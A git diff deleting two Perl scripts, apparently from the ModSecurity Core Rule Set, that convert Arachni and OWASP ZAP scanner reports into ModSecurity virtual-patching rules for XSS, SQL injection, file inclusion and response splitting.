-my $num_attacks_noflag=0;
-
-# End Vars ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-
-#############
-#   Main    #
-#############
-
-# Clean up env so perl doesn't complain
-# when trying to run the restart snort
-# script.
-delete @ENV{qw(IFS CDPATH ENV BASH_ENV PATH)};
-
-$all_vulns_xml = XML::Smart->new($all_vulnerabilities_filename);
-
-@type = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','name');
-@url = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','url');
-@param = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','variable');
-
-open(my $MODSEC_RULES, '>' , $modsec_rules_file) || die "Unable to open modsecurity rules file $modsec_rules_file";
-$MODSEC_RULES->autoflush(1);
-
-$vuln_count = 0;
-
-foreach my $current_type (@type){
-	print "==================================================================================================\n";
-	print "Vulnerability[$vuln_count] -  Type: $current_type\n";
-
-	if(exists {map { $_ => 1 } @supported_vulns}->{$current_type}){
-		parseData(to_string($current_type));
-	}else {
- 		print "Vulnerability Type: $type is not supported in this version.\n";
-		$num_not_supported++;
-	}
-	$vuln_count++;
-}
-
-close($MODSEC_RULES);
-
-print "==================================================================================================\n";
-
-print "\n\n************ END OF SCRIPT RESULTS *****************\n";
-print "Number of Vulnerabilities Processed:	$vuln_count\n";
-print "Number of ModSecurity rules generated:   $num_rules_generated\n";
-print "Number of Unsupported vulns skipped:     $num_not_supported\n";
-print "Number of bad URLs (rules not gen):      $num_bad_urls\n";
-print "****************************************************\n\n";
-print "----------------------------------------------------\n";
-print "To activate the virtual patching file ($modsec_rules_file),\n";
-print "copy it into the CRS \"base_rules\" directory and then create\n";
-print "a symlink to it in the \"activated_rules\" directory.\n";
-print "-----------------------------------------------------\n\n";
-
-
-###############
-# Subroutines #
-###############
-sub parseData
-{
-	my($vuln_str) = @_;
-	my $vuln_detail_filename;
-	my $current_vuln_xml;
-	my $current_vuln_url;
-	my $current_vuln_param;
-	my $current_uricontent;
-	my @current_params;
-	my $id = $vuln_count;
-
-	print "Found a $vuln_str vulnerability.\n";
-
-	$current_vuln_xml = XML::Smart->new($all_vulnerabilities_filename);
-	$current_vuln_url = $url[$vuln_count];
-
-	print URL_LIST "$current_vuln_url\n";
-
-	# Validate url (need separate sub?)
-	print "Validating URL: $current_vuln_url\n";
-	if(is_uri(to_string($current_vuln_url))){
-		print "URL is well-formed\n";
-		print "Continuing Rule Generation\n";
-	} else {
-		print "URL is NOT well-formed. Breaking Out of Rule Generation\n";
-		$num_bad_urls++;
-
-		# Waits for keypress in test mode so you can
-		# see why the URL failed validation.
-		if($test_mode){
-			wait_for_keypress();
-		}
-		return;
-	}
-
-	$current_uricontent = get_uricontent($current_vuln_url);
-
-
-	# Only need param if XSS attack,SQLINJ,XPATH
-	# and maybe for HTTPRS, DT.
-	# NOT for PRL and DI
-
-	if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){
-		@current_params = $param[$vuln_count];
-
-	}
-	if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){
-			print "Current vulnerable Param(s): @current_params\n";
-	}
-
-	generate_patch($vuln_str,$current_uricontent,@current_params);
-
-
-}
-
-
-sub generate_patch
-{
-	my($type,$uricontent,@params,$current_vuln_xml) = @_;
-	my $rule = "";
-	$id = "1".$vuln_count;
-
-	switch($type)
-	{
-		case ($VULN_CLASS_XSS)
-		{
-			if($uricontent ne "" && @params){
-				foreach(@params){
-					if($_ ne ""){
-						# Check to see if each vulnerable parameter is valid
-						# then generate a rule using both uricontent and the
-						# parameter
-						$rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/XSS.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
-
-							print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
-							print "$VULN_CLASS_XSS (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
-							$num_rules_generated++;
-					}
-				}
-			}
-		}
-
-		case ($VULN_CLASS_SQLI)
-		{
-
-			if($uricontent ne "" && @params){
-				foreach(@params){
-					if($_ ne ""){
-						$rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
-
-					print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
-                                        print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
-                                        $num_rules_generated++;
-
-
-					}
-				}
-			}
-		}
-
-		case ($VULN_CLASS_BLIND_SQLI)
-                {
-
-                        if($uricontent ne "" && @params){
-                                foreach(@params){
-                                        if($_ ne ""){
-                                                $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
-
-                                        print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
-                                        print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
-                                        $num_rules_generated++;
-
-
-                                        }
-                                }
-                        }
-                }
-
-		case ($VULN_CLASS_LFI)
-		{
-			if($uricontent ne "" && @params){
-				foreach(@params){
-					if($_ ne ""){
-                                                $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/LFI',tag:'WASCTC/WASC-33',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/LFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
-
-                                        print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
-                                        print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
-                                        $num_rules_generated++;
-
-
-					}
-				}
-			}
-		}
-
-		case ($VULN_CLASS_RFI)
-                {
-                        if($uricontent ne "" && @params){
-                                foreach(@params){
-                                        if($_ ne ""){
-                                                $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RFI',tag:'WASCTC/WASC-05',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
-
-                                        print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
-                                        print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
-                                        $num_rules_generated++;
-
-
-                                        }
-                                }
-                        }
-                }
-
-		case ($VULN_CLASS_HTTPRS)
-		{
-                        if($uricontent ne "" && @params){
-                                foreach(@params){
-                                        if($_ ne ""){
-                                                $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RESPONSE_SPLITTING',tag:'WASCTC/WASC-25',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RESPONSE_SPLITTING.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
-
-                                        print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
-                                        print "$VULN_CLASS_RFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
-                                        $num_rules_generated++;
-
-
-                                        }
-                                }
-                        }
-                }
-
-	}
-}
-
-sub get_uricontent
-{
-	my($url) = @_;
-	my $regex = "http:\/\/+[a-zA-Z0-9.:-]*\/";
-
-	# First, trim the first part out of the URL:
-	# http://.../
-	$url =~ /$regex/;
-	substr($url,index($url,$&),length($&)) = "";
-
-	# If the URL contains a php or cgi query with
-	# one or more params and values, trim those out.
-	# Trim from the question mark to the end.
-	if($url =~ /\?/){
-		substr($url,index($url,"?")) = "";
-	}
-	return $url;
-
-}
diff --git a/util/virtual-patching/zap2modsec.pl b/util/virtual-patching/zap2modsec.pl
deleted file mode 100755
index 03fa21e03..000000000
--- a/util/virtual-patching/zap2modsec.pl
+++ /dev/null
@@ -1,318 +0,0 @@
-#!/opt/local/bin/perl -T
-
-#############################################
-# -=[ Virtual Patching Converter Script ]=- #
-#      Converts OWASP ZAP XML Output         #
-#   https://code.google.com/p/zaproxy/      #
-#                                           #
-#             zap2modsec.pl                 #
-#             Version: 1.0                  #
-#                                           #
-#            Copyright 2011                 #
-#   Trustwave's SpiderLabs Research Team    #
-#           www.trustwave.com               #
-#                                           #
-#   Based On Code Originally Created by:    #
-#            The Denim Group                #
-#          www.denimgroup.com               #
-#############################################
-
-use XML::Smart;
-use Switch;
-use Data::Types qw(:all);
-use Data::Validate::URI qw(is_uri);
-use Getopt::Std;
-use Acme::Comment type=>'C++', one_line=>1; #Block commenting, can be removed later
-
-#############
-# Variables #
-#############
-
-# [Configuration Vars]
-my %param;
-getopt("f",\%param);
-$filename = $param{f};
-my $all_vulnerabilities_filename = "$filename";
-
-unless ($filename) {
-    print "Flag:\n\n\t -f:\t path to ZAP xml report file\nUsage:\n\n\t./zap2modsec.pl -f ./zap_report.xml\n\n";
-    exit;
-}
-
-
-my $modsec_rules_file = "./modsecurity_crs_48_virtual_patches.conf";
-
-# [End Config Vars]
-
-my $VULN_CLASS_XSS = "Cross Site Scripting";
-my $VULN_CLASS_SQLI = "SQL Injection";
-my $VULN_CLASS_SQLI_FINGERPRINT = "SQL Injection Fingerprinting";
-my $VULN_CLASS_LFI = "Path Traversal";
-my $VULN_CLASS_RFI = "Remote File Inclusion";
-my $VULN_CLASS_HTTPRS = "HTTP Response Splitting";
-
-# Only the vulnerabilities in this array will have
-# rules generated for them.
-my @supported_vulns = ($VULN_CLASS_XSS, $VULN_CLASS_SQLI, $VULN_CLASS_SQLI_FINGERPRINT, $VULN_CLASS_LFI, $VULN_CLASS_RFI, $VULN_CLASS_HTTPRS);
-
-my $num_rules_generated=0;
-my $num_not_supported=0;
-my $num_bad_urls=0;
-
-my $wait_for_keypress=1;
-my $request_failed=0;
-
-my $all_vulns_xml;
-my @type;
-my @id;
-my $vuln_count;
-
-my $num_attacks_flag=0;
-my $num_attacks_noflag=0;
-
-# End Vars ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-
-#############
-#   Main    #
-#############
-
-# Clean up env so perl doesn't complain
-# when trying to run the restart snort
-# script.
-delete @ENV{qw(IFS CDPATH ENV BASH_ENV PATH)};
-
-$all_vulns_xml = XML::Smart->new($all_vulnerabilities_filename);
-
-@type = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','alert');
-@url = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','uri');
-@param = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','param');
-
-open(my $MODSEC_RULES, '>' , $modsec_rules_file) || die "Unable to open modsecurity rules file $modsec_rules_file";
-$MODSEC_RULES->autoflush(1);
-
-$vuln_count = 0;
-
-foreach my $current_type (@type){
-	print "==================================================================================================\n";
-	print "Vulnerability[$vuln_count] -  Type: $current_type\n";
-
-	if(exists {map { $_ => 1 } @supported_vulns}->{$current_type}){
-		parseData(to_string($current_type));
-	}else {
- 		print "Vulnerability Type: $type is not supported in this version.\n";
-		$num_not_supported++;
-	}
-	$vuln_count++;
-}
-
-close($MODSEC_RULES);
-
-print "==================================================================================================\n";
-
-print "\n\n************ END OF SCRIPT RESULTS *****************\n";
-print "Number of Vulnerabilities Processed:	$vuln_count\n";
-print "Number of ModSecurity rules generated:   $num_rules_generated\n";
-print "Number of Unsupported vulns skipped:     $num_not_supported\n";
-print "Number of bad URLs (rules not gen):      $num_bad_urls\n";
-print "****************************************************\n\n";
-print "----------------------------------------------------\n";
-print "To activate the virtual patching file ($modsec_rules_file),\n";
-print "copy it into the CRS \"base_rules\" directory and then create\n";
-print "a symlink to it in the \"activated_rules\" directory.\n";
-print "-----------------------------------------------------\n\n";
-
-
-###############
-# Subroutines #
-###############
-sub parseData
-{
-	my($vuln_str) = @_;
-	my $vuln_detail_filename;
-	my $current_vuln_xml;
-	my $current_vuln_url;
-	my $current_vuln_param;
-	my $current_uricontent;
-	my @current_params;
-	my $id = $vuln_count;
-
-	print "Found a $vuln_str vulnerability.\n";
-
-	$current_vuln_xml = XML::Smart->new($all_vulnerabilities_filename);
-	$current_vuln_url = $url[$vuln_count];
-
-	print URL_LIST "$current_vuln_url\n";
-
-	# Validate url (need separate sub?)
-	print "Validating URL: $current_vuln_url\n";
-	if(is_uri(to_string($current_vuln_url))){
-		print "URL is well-formed\n";
-		print "Continuing Rule Generation\n";
-	} else {
-		print "URL is NOT well-formed. Breaking Out of Rule Generation\n";
-		$num_bad_urls++;
-
-		# Waits for keypress in test mode so you can
-		# see why the URL failed validation.
-		if($test_mode){
-			wait_for_keypress();
-		}
-		return;
-	}
-
-	$current_uricontent = get_uricontent($current_vuln_url);
-
-
-	# Only need param if XSS attack,SQLINJ,XPATH
-	# and maybe for HTTPRS, DT.
-	# NOT for PRL and DI
-
-	if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){
-		@current_params = $param[$vuln_count];
-
-	}
-	if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){
-			print "Current vulnerable Param(s): @current_params\n";
-	}
-
-	generate_patch($vuln_str,$current_uricontent,@current_params);
-
-
-}
-
-
-sub generate_patch
-{
-	my($type,$uricontent,@params,$current_vuln_xml) = @_;
-	my $rule = "";
-	$id = "1".$vuln_count;
-
-	switch($type)
-	{
-		case ($VULN_CLASS_XSS)
-		{
-			if($uricontent ne "" && @params){
-				foreach(@params){
-					if($_ ne ""){
-						# Check to see if each vulnerable parameter is valid
-						# then generate a rule using both uricontent and the
-						# parameter
-						$rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/XSS.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
-
-							print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
-							print "$VULN_CLASS_XSS (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
-							$num_rules_generated++;
-					}
-				}
-			}
-		}
-
-		case ($VULN_CLASS_SQLI)
-		{
-
-			if($uricontent ne "" && @params){
-				foreach(@params){
-					if($_ ne ""){
-						$rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
-
-					print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
-                                        print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
-                                        $num_rules_generated++;
-
-
-					}
-				}
-			}
-		}
-
-		case ($VULN_CLASS_BLIND_SQLI)
-                {
-
-                        if($uricontent ne "" && @params){
-                                foreach(@params){
-                                        if($_ ne ""){
-                                                $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
-
-                                        print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
-                                        print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
-                                        $num_rules_generated++;
-
-
-                                        }
-                                }
-                        }
-                }
-
-		case ($VULN_CLASS_LFI)
-		{
-			if($uricontent ne "" && @params){
-				foreach(@params){
-					if($_ ne ""){
-                                                $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/LFI',tag:'WASCTC/WASC-33',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/LFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
-
-                                        print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
-                                        print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
-                                        $num_rules_generated++;
-
-
-					}
-				}
-			}
-		}
-
-		case ($VULN_CLASS_RFI)
-                {
-                        if($uricontent ne "" && @params){
-                                foreach(@params){
-                                        if($_ ne ""){
-                                                $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RFI',tag:'WASCTC/WASC-05',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
-
-                                        print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
-                                        print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
-                                        $num_rules_generated++;
-
-
-                                        }
-                                }
-                        }
-                }
-
-		case ($VULN_CLASS_HTTPRS)
-		{
-                        if($uricontent ne "" && @params){
-                                foreach(@params){
-                                        if($_ ne ""){
-                                                $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RESPONSE_SPLITTING',tag:'WASCTC/WASC-25',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RESPONSE_SPLITTING.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
-
-                                        print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
-                                        print "$VULN_CLASS_RFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
-                                        $num_rules_generated++;
-
-
-                                        }
-                                }
-                        }
-                }
-
-	}
-}
-
-sub get_uricontent
-{
-	my($url) = @_;
-	my $regex = "http:\/\/+[a-zA-Z0-9.:-]*\/";
-
-	# First, trim the first part out of the URL:
-	# http://.../
-	$url =~ /$regex/;
-	substr($url,index($url,$&),length($&)) = "";
-
-	# If the URL contains a php or cgi query with
-	# one or more params and values, trim those out.
-	# Trim from the question mark to the end.
-	if($url =~ /\?/){
-		substr($url,index($url,"?")) = "";
-	}
-	return $url;
-
-}